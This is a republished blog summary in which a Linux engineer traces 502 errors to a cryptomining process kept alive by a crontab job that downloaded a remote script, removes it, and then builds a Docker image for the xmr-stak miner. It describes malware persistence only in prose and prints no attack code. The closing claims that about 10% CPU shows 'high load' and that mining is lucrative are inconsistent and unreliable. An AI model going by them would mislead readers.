How I Detected and Stopped a Hidden Crypto‑Mining Malware on My Linux Server
A Linux ops engineer troubleshoots persistent 502 errors, discovers a rogue cranberry process auto‑restarted by a malicious crontab job, removes the malware, then explores the underlying xmr‑stak CPU mining tool and builds a Docker image to control the mining workload.
Origin
One afternoon the production system began returning frequent 502 errors and extremely slow responses.
Initial suspicion fell on a colleague downloading large files, but other sites loaded quickly and bandwidth usage was only 80 Mb, so the cause remained unclear.
Problem Solving
After SSH‑ing into the server, the top command revealed the cranberry process consuming almost all CPU.
Attempting to kill the process stopped it temporarily, but it immediately restarted.
Further inspection revealed a crontab entry that periodically downloaded a script from a remote server.
Viewing the crontab list showed the malicious command.
Removing the crontab entry stopped the automatic script download, but the cranberry process kept restarting.
Identifying the parent process that executed the script and killing it finally halted the malware.
After terminating the offending process and then killing cranberry again, the system stabilized.
Further inspection uncovered additional mining trojans, which were removed using the same approach.
The Road to Wealth
While analyzing the malware, the engineer discovered the xmr‑stak‑cpu mining tool.
GitHub repositories were referenced:
https://github.com/fireice-uk/xmr-stak
https://github.com/fireice-uk/xmr-stak-cpu
A test machine was prepared to build a Docker image for the miner.
The original script creates a Docker container that installs xmr‑stak on CentOS or Ubuntu. The engineer modified it to keep the container and removed CUDA‑related sections.
Running the adjusted script builds the Docker image and starts mining. After configuring the coin type, pool address, and wallet, the miner connects successfully.
The web interface shows mining progress.
After stopping the container, two files ( cpu.txt and config.txt) appear in the /bin directory, containing the mining configuration.
These files allow the miner to be restarted without re‑entering settings.
Resource usage spikes to about 10 % CPU, demonstrating the high load a mining container can generate.
With sufficient compute power, the mining operation can become a lucrative side‑project.
Some content sourced from 51CTO bloggers feelgood3000 and storysky.
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
MaGe Linux Operations
Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.